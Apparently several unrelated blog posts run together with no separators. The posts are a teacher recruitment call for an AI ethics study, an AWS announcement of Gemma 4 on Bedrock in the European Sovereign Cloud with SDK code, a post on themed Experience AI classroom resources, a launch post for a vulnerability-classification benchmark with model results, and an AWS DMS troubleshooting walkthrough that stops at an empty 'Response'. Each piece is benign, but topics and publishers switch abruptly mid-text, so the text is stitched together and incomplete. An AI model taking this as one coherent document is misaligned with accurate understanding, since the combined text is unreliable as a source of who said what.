Are you a computing teacher in England, Scotland, or Wales who works with 11- to 14-year-olds and is interested in how young people learn about AI ethics and sustainability?
The study involves attending two in-person workshops in Cambridge, co-designing and teaching a unit of work, and taking part in evaluation activities such as surveys and interviews. Where necessary, we can offer support with the costs of attending the workshops, such as travel, accommodation, and supply cover.
Why focus on AI ethics and sustainability?
According to a recent report, in the UK more than half of 8- to 17-year-olds use AI tools, and as these systems become an increasingly significant part of everyday life, helping young people to critically evaluate their impact is vital.
We recently conducted a scoping literature review to explore what ethical concepts are covered by AI literacy interventions for lower secondary students (11- to 14-year-olds). This work has been accepted for publication at the Frontiers in Education conference, which is taking place in October.
Our research showed that when AI ethics is taught to lower secondary students, interventions tend to focus most on concepts such as fairness and privacy. For example, multiple activities explored the important issue of algorithmic bias, teaching students about the causes of bias (such as training AI systems with small or unrepresentative datasets) and discussing real-world examples of bias in AI.
However, we found that other ethical concepts, such as proportionality and governance, are not often taught. And while a few interventions featured the theme of sustainability, we found that only one directly taught students about the environmental impact of AI itself.
Our new study aims to help address this gap by supporting young people to explore the social and ethical impact of AI tools from a sustainability perspective. Teachers will use real-world examples to engage their students in discussion and ethical reasoning. We hope the findings will support more computing teachers to teach about AI ethics in their lessons, and help students to think critically about the use of AI tools.
We are using a design-based research approach to work collaboratively with teachers to co-design a unit of lessons focused on AI ethics and sustainability.
Participating in the study will involve:
Attending two in-person professional development and design workshops in Cambridge (one in early December 2026 and one during the 2027–28 school year)
Delivering the co-designed lessons in your classroom (in early 2027 and the spring of 2028)
Taking part in evaluation activities such as surveys, classroom observations, and interviews
How can I join the study?
If you teach computing at lower secondary level (Years 7–9 or S1–S3) in England, Scotland, or Wales and would like to help shape the way we teach young people about ethical issues around AI, we would love to hear from you. Please register your interest via the form below.
European organizations can run AI workloads on Amazon Web Services (AWS) while keeping data within the European Union (EU) and meeting regulatory requirements. You can now run generative AI workloads on open weight models on Amazon Bedrock in the AWS European Sovereign Cloud. We’re excited to announce the general availability of the first open weight model family, Gemma 4, on the Amazon Bedrock next-generation inference engine in the AWS European Sovereign Cloud. Gemma 4, released under the Apache 2.0 license, on Amazon Bedrock benefits from the same data residency and operational controls that define the AWS European Sovereign Cloud so you can build, iterate, and scale generative AI applications while meeting digital sovereignty requirements.
The AWS European Sovereign Cloud is an independent cloud for Europe, located entirely within the EU, designed to help customers meet their most stringent digital sovereignty requirements. It runs entirely within the EU and is independently operated with strong technical controls, sovereign assurances and legal protections. Only AWS employees who reside in the EU control day-to-day operations, including access to data centers, technical support, and customer service.
In this post, we explain how the Amazon Bedrock inference engine protects your inference data when running Gemma 4 models, how the AWS European Sovereign Cloud keeps it within the EU, and then walk through the available Gemma 4 models and your first inference request.
Next generation inference engine for Amazon Bedrock
The inference engine is a distributed engine for serving large-scale machine learning models, built for high performance, reliability, and security. You reach it through the bedrock-mantle endpoint, which supports OpenAI-compatible APIs (the Responses and Chat Completions APIs). You can bring an existing OpenAI SDK codebase to Amazon Bedrock by changing only the base URL and API key. The Responses API supports stateful conversation management, which rebuilds context without you passing conversation history with each request. Stored responses are scoped by Amazon Bedrock project, a logical boundary that represents a workload for access control, cost tracking, and usage monitoring.
The engine applies the same operational security practices you rely on across AWS. Access follows a least privilege model, where each operator has access only to the systems a specific task requires, and only for the time that privilege is needed. Any access to systems that store or process customer data or metadata is logged, monitored for anomalies, and audited. All your prompts and responses are kept private during inference.
How your inference data is protected
Amazon Bedrock uses a zero operator access data security model, meaning no service operators can access model input or output during inference. It also uses a zero data retention model, so by default it doesn’t store your inputs or outputs. For certain models, limited retention might apply for abuse detection (see the Amazon Bedrock abuse detection documentation). Your prompts and responses are encrypted in transit and, by default, are not shared with the model provider.
All inference stays within the eusc-de-east-1 AWS Region as described in the following section on data residency. Combined with the data residency and EU-based operations of the AWS European Sovereign Cloud, this gives organizations in highly regulated industries the confidence to run their most sensitive AI workloads in the cloud.
Data residency and regional availability
The AWS European Sovereign Cloud became generally available in January 2026, with its first Region in Brandenburg, Germany (eusc-de-east-1). It’s a separate, independently operated cloud, with infrastructure located entirely within the EU and no critical dependencies on non-EU personnel or infrastructure. All your content remains within the Region you select unless you choose otherwise. Beyond content, customer-created metadata including roles, permissions, resource labels, and configurations also stays within the EU. The AWS European Sovereign Cloud is operated exclusively by EU residents located in the EU. We’re also gradually transitioning the AWS European Sovereign Cloud to be operated exclusively by EU citizens located in the EU. During this transition period we will continue to work with a blended team of EU residents and EU citizens located in the EU.
All Amazon Bedrock inference requests, including Gemma 4, use in-Region inference in eusc-de-east-1, which keeps every request within the AWS European Sovereign Cloud. Global cross-Region inference, which routes requests across commercial AWS Regions worldwide, isn’t available in the AWS European Sovereign Cloud.
Control over who can access your data
With AWS Identity and Access Management (IAM), you decide which principals in your account can call the inference API and which models they can use. Fine-grained permissions let you grant only the access each workload needs, following least privilege, and we recommend short-lived credentials over long-term keys.
For auditing, every call to the endpoint is recorded in AWS CloudTrail, giving your security and compliance teams an audit trail of who invoked inference and when. You can also monitor usage with Amazon CloudWatch and set alarms on patterns that matter to you, such as unexpected spikes in request volume.
Open weight models in the AWS European Sovereign Cloud
Organizations adopting open weight foundation models (FMs) for production face a constant challenge: how to access the leading models without compromising on data protection, regulatory alignment, or operational control. Amazon Bedrock removes that challenge. It gives you leading open weight FMs through a fully managed service, with inference running entirely on infrastructure operated by AWS and the security and privacy controls you expect from Amazon Bedrock. Because the models are open weight, you can independently evaluate the model architecture and training methodology, benchmark your own workloads, and fine-tune on proprietary data when customization is required.
Gemma 4 is a family of open weight models, released under the Apache 2.0 license. It’s available in three instruction-tuned variants, so you can evaluate and choose the model that fits your workload. The following table provides guidance on which model to choose based on your use case:
Model
Use case
Specifications
Gemma 4 31B (google.gemma-4-31b-it)
Reasoning-heavy or coding-heavy with a single dense model
30.7 billion parameter dense model with a 256 K token context window
Gemma 4 26B-A4B (google.gemma-4-26b-a4b-it)
Cost-sensitive at high throughput, with knowledge breadth requirements
Mixture-of-experts model with 25.2 billion total parameters and 3.8 billion active per token, with a 256 K token context window
Gemma 4 E2B
(google.gemma-4-e2b-it)
Latency-sensitive, on-device-style, or multimodal classification
Compact model with 5.1 billion total parameters and 2.3 billion effective parameters using per-layer embeddings (PLE), with a 128 K token context window
All three variants offer built-in reasoning, native function calling, and multimodal input across text and image.
Get started with Gemma 4 models on Amazon Bedrock
Gemma 4 is served through the bedrock-mantle endpoint, the OpenAI-compatible API for the next-generation inference engine, so you can call it with the OpenAI Python and TypeScript SDKs. Use the following steps to use the OpenAI Python SDK to send your first request to Gemma 4 31B in the AWS European Sovereign Cloud.
Prerequisites
To follow this example, you need an AWS account with access to the AWS European Sovereign Cloud and an IAM principal with permissions to call the bedrock-mantle endpoint. Create an IAM policy that grants the two actions this walkthrough uses, then attach it to your IAM principal. The bedrock-mantle:CreateInference action runs inference, and the bedrock-mantle:CallWithBearerToken action authenticates with an Amazon Bedrock API key. The following sample policy grants the actions this example needs. Scope the resources further for your environment as described after the policy.
Replace <account-id> and <project-id> with your own values.
Install the OpenAI SDK and the Amazon Bedrock token generator with the command pip install “openai>=2.45.0" aws-bedrock-token-generator.
Authenticate
You authenticate with an Amazon Bedrock API key. Amazon Bedrock offers two types of API keys. Short-term keys expire automatically within 12 hours and inherit the permissions of the IAM principal that generated them, which makes them the recommended choice for production. Long-term keys last until a configured expiration and are intended for development and exploration. For production, use the auto-refreshing short-term key shown in the following example, or store the key in AWS Secrets Manager.
from aws_bedrock_token_generator import provide_token
from openai import BedrockOpenAI
region = "eusc-de-east-1"
client = BedrockOpenAI(
aws_region=region,
base_url="https://bedrock-mantle.eusc-de-east-1.api.amazonwebservices.eu/v1",
bedrock_token_provider=lambda: provide_token(region=region),
)
Alternatively, you can pass a short-term API key through an environment variable. This key isn’t refreshed and expires after at most 12 hours.
import os
from openai import OpenAI
client = OpenAI(
base_url="https://bedrock-mantle.eusc-de-east-1.api.amazonwebservices.eu/v1",
api_key=os.environ["AWS_BEARER_TOKEN_BEDROCK"],
)
Run your first inference with the Responses API
The Responses API uses a single input field and returns the generated text in output_text. Setting store to false means Amazon Bedrock doesn’t retain the request or response.
response = client.responses.create(
model="google.gemma-4-31b-it",
input="Explain the benefits of open-weight models for regulated industries.",
max_output_tokens=512,
store=False,
)
print(response.output_text)
Call the Chat Completions API
You can also call the OpenAI-compatible Chat Completions endpoint directly. If you use AWS credentials instead of an API key, sign the request with AWS Signature Version 4 (SigV4), as in the following example.
This walkthrough creates no persistent resources, so there’s nothing to delete. The short-term API keys used here expire automatically within 12 hours.
Pricing and availability
Gemma 4 is available in Amazon Bedrock in the AWS European Sovereign Cloud. You pay per token with no upfront commitment, and usage counts toward your existing AWS commitments. For current pricing, see Amazon Bedrock pricing. For model and Regional availability, see Regional availability by models.
Commitment to innovation
Beyond the technical integration, running AI workloads in a sovereign context raises important questions about requirements. As you plan AI workloads for a sovereign context, evaluate them against your organization’s requirements for data residency, model governance, and operational control. The AWS European Sovereign Cloud is designed to help you meet these requirements in the EU.
AWS is committed to making AWS the best place for European organizations to innovate with AI, without compromise. To learn more about AWS European Sovereign Cloud visit aws.eu.
If you have feedback about this post, submit comments in the Comments section below.
Artificial intelligence (AI) is already part of young people’s everyday lives, from the content recommended to them on social media to the generative AI tools they increasingly encounter. But AI technologies are also being used to tackle challenges in the wider world, from forecasting floods to monitoring our environment.
That’s why we believe AI literacy shouldn’t sit within a single subject. Young people need opportunities to explore how AI works, where it is used, and the questions it raises across the curriculum.
To address this, we created a new collection of free themed Experience AI resources, designed to make it easier for educators to bring AI literacy into the subjects and topics they already teach. The resources include those co-developed by the Raspberry Pi Foundation and Google DeepMind, alongside those developed independently by the Raspberry Pi Foundation, including two units created with support from our partner, Digital Moment.
Explore AI through the issues that matter
When we began developing these resources, we initially explored creating materials specifically for individual curriculum subjects. But through conversations with educators and our partners around the world, we learnt that a more flexible approach could be much more useful.
Curricula differ between countries, schools, and age groups, and AI technologies rarely fit neatly within traditional subject boundaries. The same technology can raise scientific, geographical, social, creative, and ethical questions.
So rather than assigning each resource to a particular subject, our new resources are organised around broad themes, including the environment, critical thinking, and ethics.
The resources include:
Flood forecasting, a lesson that explores how AI tools can be used to predict flooding
AI and social media, a unit that helps young people investigate how their online behaviour influences the content they are shown
AI detectives: The case of the clever claim, an activity that develops critical thinking about AI tools and the claims made about them
Designed for learners aged 8 to 16, the resources can be used in different subjects and adapted by educators to suit their own classroom context.
That flexibility is important. We want educators to be able to introduce meaningful AI literacy without feeling that they need to become AI specialists or find space for an entirely new subject in an already busy curriculum.
AI literacy across the curriculum
The need for this approach is increasingly recognised by subject experts.
Dr Becky Kitchen, Head of Professional Development at the Geographical Association, highlighted the importance of giving young people opportunities to engage critically with AI technologies as part of their wider learning:
“Pupils are increasingly coming into contact with AI and so it’s vital that they are taught how to harness its power in an effective and critical way. Developing resources across the curriculum to embed this knowledge, understanding, and use is critical.”
After reviewing the new resources, she added:
“These resources are outstanding. They develop pupils’ geographical knowledge while simultaneously exploring the role that AI can have in a meaningful and concrete way.”
The connections extend well beyond geography.
Professor Geoff Cox, Professor of Art and Computational Culture at London South Bank University, emphasised the role that arts and humanities subjects can play in developing a richer understanding of AI technologies:
“If AI literacy is left solely to STEM subjects or computer science, we lose the opportunity to ask deeper human, cultural, and ethical questions — questions that art is uniquely equipped to explore.”
He also highlighted the value of combining different ways of learning:
“The resources move between visual analysis, practical activity, and critical reflection, recognising that only in combination can AI literacy be developed effectively.”
These perspectives reflect an important principle behind the collection. AI literacy isn’t simply about knowing how a technology works. It is also about being able to question it, understand its applications and limitations, and consider its impact on people, communities, and the world.
Tested in real classrooms
Before launching the resources more widely, earlier this year we collaborated with our partner, Digital Moment, to give educators in Canada the opportunity to test some of them with their students. Their experiences helped us understand not only how the resources worked in practice, but also where they could fit naturally into existing teaching.
As Indra Kubicek, CEO of Digital Moment, explains:
“Educators play a critical role in helping students understand and think critically about the use of AI and its implications across a wide range of subjects. Building the next generation of creators, builders, and innovators who will shape the future of AI starts with AI education in the classroom.”
One of the educators who took part was Grade 8 teacher Sandra Theobald, who tested our AI and social media activity. Before the lesson, she expected her students, who were already regular social media users, to be familiar with many of the ideas.
While they did have a good background knowledge, the activity prompted them to make new connections between their own behaviour, the data they generate, and the content they are shown as a result of the algorithms presented to them.
Students were able to explore the ideas themselves, with Sandra taking more of a supporting role. She found that they came away feeling more confident about understanding how their interactions with social media affect what they see, and keen to share what they had discovered with their families.
For educators who may feel unsure about introducing AI tools in their classroom, Sandra’s advice is to simply give it a go, rather than waiting until feeling like an expert:
“My advice is to start small and seek out trusted resources and experts in AI education. Partner with another educator so you can explore and learn together. There is so much information available that it can feel overwhelming, so take it one step at a time. Learn alongside your students and build your confidence as you go.”
A powerful and easy resource for teachers
Canadian educator Colin McKenzie also used the AI and social media unit with his Grade 7 and 8 classes.
Using Somekone, a closed social media simulation for the classroom, his students created accounts and explored how their behaviour affected the content the system recommended.
The experience felt familiar enough to capture their attention, but gave them an opportunity they wouldn’t normally have when using a real social media platform: to examine what was happening behind the scenes.
Students reflected on their interests and choices and then used data on their own behaviour to understand how that behaviour affected what they were shown. Colin found that students were eager to return to the activity each day to discover what would happen next.
Crucially, he also found it straightforward to incorporate the activity into his existing teaching rather than having to significantly change his plans.
“I think this is a powerful and easy resource for teachers to use in the classroom. It is easy to set up and navigate, and it ties in well with curriculum areas around online usage, especially with how prominent AI is becoming in our educational lives.”
For Colin, the activity provided a practical way to connect AI literacy with what his students had already learnt about online safety and evaluating information. It also helped students recognise that the content they encounter online isn’t simply appearing by chance: their own actions can influence the content recommended to them by AI-driven systems.
The experience was valuable enough that Colin plans to make the unit part of his teaching each year.
Giving educators flexibility
Feedback like this has reinforced why flexibility is central to our approach.
A lesson about flood forecasting might support learning in geography or science. Exploring AI-generated content could lead to discussions in art, media literacy, humanities, or computing. An activity investigating social media algorithms can connect AI literacy with online safety, critical thinking, and digital citizenship.
Most importantly, these things provide opportunities for students to encounter AI literacy in different contexts and recognise that understanding AI is relevant far beyond the computing classroom.
AI literacy belongs in every classroom
AI technologies will continue to change. The contexts in which young people encounter them will change too.
Our aim isn’t to prepare students for one particular AI tool or moment in time. It’s to help them develop the knowledge and critical thinking skills they need to understand all kinds of AI technologies, question them, and make informed decisions about them.
Educators shouldn’t need to be computer science teachers, or AI experts, to do that.
By creating flexible resources that connect AI with subjects and issues young people are already exploring, we hope to make it easier for more educators to bring AI literacy into their classrooms.
Explore the new themed Experience AI resources and discover a starting point for your learners.
We’d like to say a big thank you to our global partner, Digital Moment, for their support in trialling these new resources with educators and learners in Canada.
Security teams are starting to actively use AI for security work, including vulnerability triage, penetration testing, threat modeling, incident response, and code review. The promise is speed, but a security tool that moves fast and raises too many false alarms doesn’t save time. Engineers spend time on false alarms, on-call is noisier, and teams distrust findings that matter.
Today, we’re releasing Deception Benchmark, the first benchmark designed to measure that trust problem directly. It tests whether a model can distinguish real vulnerabilities from code that looks risky but is actually safe. The benchmark includes 14,822 samples across 16 languages and more than 70 Common Weakness Enumeration (CWE) categories. We evaluated 12 models from five providers and are releasing the dataset and whitepaper to the community. Existing benchmarks measure whether AI can find or exploit vulnerabilities. This is the first to measure whether it can tell real vulnerabilities from false alarms. Under standard prompting, precision at distinguishing real vulnerabilities from false alarms landed in the mid 50s; as likely to be inaccurate as accurate.
In offensive tasks, there’s often a clear result: the exploit works or it doesn’t. Defensive reviews are harder to verify than offensive tasks; a model might recognize a suspicious pattern even when a mitigation makes the issue non-exploitable. In practice, useful systems need to reason about the code, the mitigation, and sometimes the surrounding environment.
The measurement gap
The community has made progress on security evaluations. CyberGym tests agents on more than 1,500 realistic tasks. Meta’s CyberSecEval and CyberSecEval 2 measure exploit generation. CYBENCH evaluates capture the flag (CTF) challenges. SEC-Bench and VulnBench push toward authentic security workflows.
Recent work reinforces both the progress and the gap. ExploitGym measures whether AI can escalate from a crash to a working exploit. Microsoft’s Project Perception deploys multi-agent red/blue/green teams for continuous defense. OpenAI’s GPT-Red shows that self-play red-teaming finds novel attacks that frontier models can’t defend against. Since then, OpenAI disclosed that its GPT-6 Astra model crossed the Critical cybersecurity capability threshold, and both OpenAI and Anthropic reported incidents where models gained unauthorized access to production systems during evaluations. The offensive side is moving fast. But none of this work measures the defensive precision question: when an AI system flags code as vulnerable, how often is it right?
Introducing Deception Benchmark
14,822 samples, 16 languages, and more than 70 CWE categories. We call it Deception Benchmark because the safe samples are designed to deceive models. It has real vulnerability patterns, real frameworks, real idioms, with mitigations that quietly close the exploit path. The goal is to classify code as vulnerable or safe, with no hints.
Consider a Flask endpoint that accepts user input and queries a database. A model will pattern-match to SQL injection, but the query uses parameterized statements, so the exploit path is closed. A single-turn classifier flags the pattern and moves on, never checking whether the exploit can actually work. Production tools rely on multi-step loops and agentic workflows to compensate, but that scaffolding masks whether the model itself understands the code. This benchmark strips the scaffolding away and asks the model to make the call in a single pass, so what it measures is understanding, not how many tries a harness takes to get there.
We built every sample through an adversarial loop: generate, test against frontier models, harden, repeat. If a model gets it right easily, the sample doesn’t survive. The result is a benchmark calibrated to the frontier, not below it. Building it this way is expensive. Generation and hardening of the samples consumed tens of billions of tokens. We’re releasing the result so the community doesn’t have to repeat that cost.
This benchmark generates two challenge types. Code-level challenges (6,988 samples) present vulnerable and safe variants that differ by a subtle fix. Both look suspicious, only one is exploitable. Environment-gated challenges (2,707 samples) go further: same code, different deployment context. A Kubernetes Network Policy blocks the server-side request forgery (SSRF) path. An identity and access management boundary prevents privilege escalation. The pattern is visible in the source. The infrastructure makes it unexploitable. The model has to figure out which scenario applies.
All samples were purpose-built for this benchmark, grounded in real-world patterns, real frameworks, real CWEs, and real infrastructure; without IP concerns or training data contamination.
Large-scale quality data with LLMs and humans in the loop
Generating reliable labels at this scale is difficult: a single pass—by people or by models—leaves errors that skew scores. So we treat labeling as a convergent audit loop rather than a one-time step. Every label is re-examined by multiple independent reviewers, blind to one another and to the original reasoning that produced the label. Disagreements escalate to direct adjudication, where the original reasoning is evaluated against the challenge. Unresolved cases go to human review. We repeat the loop until the scored set converges below a dispute threshold: under 3 percent of samples still contested by independent review, with a target of under 1 percent surviving human adjudication. One choice makes this defensible: we never relabel a disputed sample. When reviewers disagree, the sample moves to the unscored pool instead of being given a corrected label, so a bad challenge can remove a sample but can never introduce a wrong label into the scored set.
A human review of 100 randomly drawn scored samples found no label errors. We describe the full process in the whitepaper.
The results
The benchmark is roughly balanced: half vulnerable, half safe, so a random classifier scores 50 percent. We report two error rates separately, because they fail in opposite directions. The false positive rate (FPR) is how often the model flags safe code as vulnerable. These are the false alarms that waste an engineer’s time. The false negative rate (FNR) is how often it misses a real vulnerability and calls it safe. Accuracy alone hides this: a model that labels everything vulnerable catches every bug (0 percent FNR) but flags all safe code (100 percent FPR) and still scores about 50 percent. We consider FPR below 10 percent and FNR below 10 percent the minimum bar for production use.
Figure 1: FPR compared to FNR for 12 models across two prompting strategies. No model reaches the generous bar.
Model
Prompt
Accuracy
FPR
FNR
GPT-5.6 Sol
Direct
54.9%
92.5%
0.9%
GPT-5.6 Sol
PoE
58.9%
58.6%
23.1%
GPT-5.5
Direct
56.9%
87.8%
1.3%
GPT-5.5
PoE
62.9%
63.6%
12.4%
GPT-5.4
Direct
60.2%
81.0%
1.5%
GPT-5.4
PoE
77.7%
10.1%
33.6%
Llama 3.3 70B
Direct
58.8%
84.2%
1.1%
Llama 3.3 70B
PoE
72.2%
10.2%
44.2%
Claude Haiku 4.5
Direct
55.6%
92.1%
0.0%
Claude Haiku 4.5
PoE
75.6%
22.4%
26.3%
Claude Opus 4.6
Direct
55.9%
91.3%
0.1%
Claude Opus 4.6
PoE
75.8%
42.7%
7.0%
Claude Opus 4.7
Direct
58.3%
85.5%
0.9%
Claude Opus 4.7
PoE
75.9%
32.0%
16.8%
Claude Opus 4.8
Direct
53.8%
95.7%
0.2%
Claude Opus 4.8
PoE
75.8%
32.5%
16.4%
Claude Opus 5
Direct
77.3%
41.5%
5.2%
Claude Opus 5
PoE
79.3%
24.9%
16.8%
Claude Sonnet 5
Direct
62.9%
74.7%
2.2%
Claude Sonnet 5
PoE
74.7%
31.8%
19.2%
Amazon Nova 2 Lite
Direct
56.3%
89.2%
1.2%
Amazon Nova 2 Lite
PoE
70.1%
45.2%
15.5%
Mistral Large
Direct
52.2%
99.0%
0.0%
Mistral Large
PoE
65.5%
49.3%
20.6%
Among the general-purpose frontier models tested, no configuration achieves both FPR and FNR less than 10 percent on this benchmark.
Every model has the same failure mode. With direct prompting, they catch up to 95 percent of real vulnerabilities but also flag 41–99 percent of safe code. Precision runs from 52 percent to 71 percent, clustered in the mid-50s; effectively as likely to be inaccurate as accurate. The models see a vulnerability pattern and stop reasoning. Proof-of-exploit prompting cuts false positives by 17–74 points but misses 7–44 percent of real vulnerabilities. The environment-gated challenges are worse: models flag the code and ignore the Kubernetes Network Policy next to it. No tested configuration keeps both false positives and false negatives below 10 percent.
These results reflect general-purpose models in single-turn prompting. Purpose-built systems with multi-step validation and tool use are a different operating point that we didn’t measure, and if a harness can close the gap between pattern recognition and genuine understanding, this benchmark is the place to demonstrate it. Two cautions before assuming it already does. Agentic verification is proven mostly on offensive tasks, where success can be confirmed: the exploit fires or it doesn’t. Judging that code is safe has no such oracle. Extra iterations re-sample the same judgment rather than confirm a negative, and a harness still inherits the base model’s understanding. If the model can’t separate an effective mitigation from an ineffective one in a single pass, more passes won’t add the missing knowledge. That’s what this benchmark measures: the model’s intrinsic ability to understand code, tested at the single-turn baseline where no scaffolding can mask the gap.
For security teams evaluating AI tools today: ask your vendors how their system performs on tasks like this, not just whether it finds vulnerabilities, but how often it’s wrong. Pair any AI-assisted review with human verification on high-risk code paths, and use Deception Benchmark to hold your tools accountable.
Availability
We built Deception Benchmark to simplify measuring this problem in a reproducible way. The public release includes the samples and evaluation workflow. We don’t release the labels, so submissions can be scored consistently over time without turning the benchmark into a memorization exercise.
Of the 14,822 samples, 9,695 are scored; the remaining 5,127 are held out and unscored, mixed in with the rest of the benchmark. The goal is straightforward: make it more difficult to optimize the benchmark compared to improving the underlying system. We describe that design in more detail in the whitepaper.
Deception Benchmark is available on GitHub, along with the whitepaper and submission instructions for verified scoring. If you’re building security tooling, you can download the dataset, run your system against the benchmark, and submit predictions for scored evaluation.
If you have feedback about this post, submit comments in the Comments section below.
Migrating a production database is a high-risk operational event. AWS DMS is a cloud service that migrates relational databases, data warehouses, and other data stores into the AWS Cloud or between environments. It moves the rows reliably, but the failures that page an on-call engineer rarely happen during the data copy. They occur in the hours after the cutover. A query that was fast on the old engine starts doing full scans. A connection pool sized for the old database becomes exhausted. A downstream service that nobody mapped begins timing out.
These are operational problems, not data problems. They resolve slowly because engineers must correlate many sources under time pressure: DMS task state, Amazon CloudWatch metrics, Amazon RDS Performance Insights, logs, and deployment history.
AWS DevOps Agent can investigate and troubleshoot your database migration issues. DevOps Agent is your always-available teammate that accelerates and validates the deployment of code changes, then keeps your applications running optimally across AWS, multicloud, and on-prem environments. It learns about your resources and their relationships, then correlates telemetry, code, and deployment data to pinpoint root causes and recommend fixes. When issues arise, it autonomously investigates and resolves them.
In this post, you’ll learn how to extend AWS DevOps Agent into a DMS migration specialist. You deploy a sample Model Context Protocol (MCP) server that gives the agent read-only, migration-specific tools and a library of runbooks. You’ll then watch the agent investigate real migration issues and reach grounded root causes on its own. The accompanying GitHub repository includes the full source and a deployment guide.
Prerequisites
Before you begin, make sure you have the following:
An AWS account with AWS DevOps Agent turned on and an Agent Space created. Note the Agent Space ID.
An active AWS DMS replication task that migrates to Amazon Aurora PostgreSQL-Compatible Edition, with data validation turned on. The repository includes scripts that provision a test migration if you need one.
Permissions to deploy AWS CloudFormation stacks that create AWS Lambda functions, IAM roles, and an S3 bucket.
The AWS Command Line Interface (AWS CLI) v2 configured, and Python 3.10 or later. No Node.js or CDK is required.
Architecture
DevOps Agent runs inside AWS. It reaches the MCP server over HTTPS and authenticates each request with AWS Signature Version 4 (SigV4). SigV4 is the same IAM mechanism that every AWS API uses, with no keys or shared secrets. The sample deploys your MCP server onto AWS Lambda, behind a Lambda function URL with the AWS_IAM auth type. That auth type accepts only SigV4-signed requests from authorized principals.
The following diagram shows the request path from the agent to the tools.
You deploy the server and its IAM roles as one AWS CloudFormation stack. You then register the function URL with DevOps Agent and add the tools to the allow list in your Agent Space. When a symptom appears, you create an investigation. The agent assumes the role, calls the tools, correlates the results, and returns the root cause.
Implementation walkthrough
DevOps Agent supports custom tools through MCP. After you deploy the sample server and register it, the agent calls its tools during an investigation, the same way it calls a CloudWatch tool. Every tool in this server calls only Describe*, Get*, List*, Lookup*, and TestConnection APIs. None of them modifies a resource, which is the property that lets you give them to an autonomous agent.
The MCP exposes 20 tools across the migration lifecycle. The following table lists the ones the agent reaches most often.
Tool
Returns
validate_migration_data
Validation state distribution, failed and suspended tables (report and skill prompt)
get_validation_failures
Tables in non-Validated states with failed and suspended record counts
check_connection_health
Endpoint connectivity (waits for the real test result), SSL mode, failure messages
analyze_cdc_latency
Source vs target CDC latency, backlog, and an assessment
check_replication_instance_health
Replication-instance CPU, memory, swap, storage, network with flags
capture_aurora_performance
Aurora CloudWatch metrics and Performance Insights waits and SQL
check_stabilization
Post-cutover regressions, missing alarms, recommendations (report and skill prompt)
summarize_task_health
One-call roll-up across status, validation, latency, and instance health
list_runbooks / get_runbook
Browse the runbook catalog and fetch one by id
The server also ships 46 runbooks covering data validation, full load, CDC, connectivity, replication-instance health, Aurora target health, and cutover readiness.
Database migration stages
You can apply this approach across the migration timeline:
Pre-cutover readiness: Confirm endpoint connectivity and that every table has reached the Validated state before you commit to the switch.
Issue investigation during cutover: You give the agent a symptom, such as a validation mismatch or a latency spike, and it finds the root cause instead of several engineers chasing parallel theories.
Post-cutover stabilization: Detect regressions and missing alarms on the new database before they turn into outages.
What the agent sees, and what it does not
Out of the box, DevOps Agent reads Amazon CloudWatch, AWS CloudTrail, and the AWS APIs in your account. However, for a DMS migration, the agent needs to read migration-specific reasoning an operator applies: how to read a DMS validation state distribution, how to tell a source-side change data capture (CDC) bottleneck from a target-side one, or which alarms a freshly promoted Aurora instance should have but it only has access to raw CloudWatch metrics.
You close that gap with the sample MCP server:
Read-only tools that turn DMS, CloudWatch, and Performance Insights data into pre-aggregated reports. The tools do the counting deterministically, and the agent does the interpretation.
Runbooks the agent can browse and follow, each grounded in public AWS documentation.
Deploy the MCP server
The MCP server runs on AWS Lambda, the serverless compute service that runs your code without provisioning servers. AWS DevOps Agent reaches it through a Lambda function URL, a dedicated HTTPS endpoint for the function. You do not run or host anything yourself; the deployment creates the Lambda function and its endpoint in your account.
The endpoint is not open to the public. It uses the AWS_IAM auth type, so it accepts only requests that DevOps Agent signs with an IAM role in your account, as described in the architecture section above.
Deploying and registering are two distinct steps. Deploying creates the server: the Lambda function, the function URL, and the IAM roles. Registering tells DevOps Agent that the server exists and adds its tools to the allow list. You can select either of the two options as indicated below.
Option A: Deploy MCP and register via AWS Management Console
Deploy the MCP and perform the MCP registration manually via console:
./deploy.sh us-east-1 --skip-register
The script deploys the MCP server and prints its Function URL and role ARN, then leaves the registration to you. With the server deployed, register it in the console by following Connecting MCP servers:
Sign in to the AWS Management Console and open the AWS DevOps Agent console.
On the Capability Providers page, find MCP Server under Available providers and choose Register.
On the MCP server details page, enter a Name, the Endpoint URL (the function URL from the stack output), and an optional Description.
For the authorization method, choose AWS SigV4, enter the role ARN from the stack output, set the Region to us-east-1, and set the service name to lambda.
Open your Agent Space, go to the Capabilities tab, and add the tools to the allow list.
Option B: Deploy MCP and register with one click deployment
Alternatively, you can deploy the MCP and perform the MCP registration with one-click deployment. Complete the following steps to deploy and register the server.
Clone the repository and change to the deployment directory:
git clone https://github.com/aws-samples/sample-dms-devops-mcp.git
cd sample-dms-devops-mcp/lambda_mcp
Run the deployment script with your target Region:
./deploy.sh us-east-1
The script prompts for your Agent Space ID. It then packages the Lambda code, deploys the CloudFormation stack, and registers the server with your Agent Space, allow-listing all of its read-only tools.
Verify the deployment. In the DevOps Agent console, open your Agent Space, go to the Capabilities tab, and confirm the tools appear under MCP Servers.
If registration returns HTTP 403, confirm the IAM role grants both lambda:InvokeFunctionUrl and lambda:InvokeFunction. Granting only the first returns 403. The template grants both.
Review and investigation
To validate the approach, we ran it against a live migration: an Amazon Relational Database Service (Amazon RDS) for MySQL source replicating to Aurora PostgreSQL through a DMS task with data validation turned on, 1,000 rows across four tables (customers, products, orders, and order_items). Every query and response below is from a real DevOps Agent investigation against that environment. You start each one by entering a prompt in the DevOps Agent web app, the conversational interface where you investigate issues and review findings.
A consistent pattern shows up across all five investigations: the agent chooses a different set of tools for each question. It is reasoning about which tool fits, not running a fixed script.
The five scenarios are not demo picks. Each one represents a class in the DMS failure taxonomy the server’s 46 runbooks cover: data validation, full load, change data capture, connectivity, replication-instance health, Aurora target health, and cutover readiness. That taxonomy is the operational surface of a real migration, so a reader who follows these five is rehearsing the categories they are most likely to hit, not a curated happy path. Each scenario below is one representative of its class; the full catalog is available to the agent through list_runbooks.
Pre-Migration: Confirm cutover readiness
Before a cutover, you want a clear go or no-go.
Query
We are about to cut over the DMS migration (task dms-mcp-test-task, us-east-1, target Aurora dms-mcp-test-target). Before we switch the application, confirm whether this migration is ready: are the endpoints healthy and has all data validated? Give me a clear go or no-go.
Response
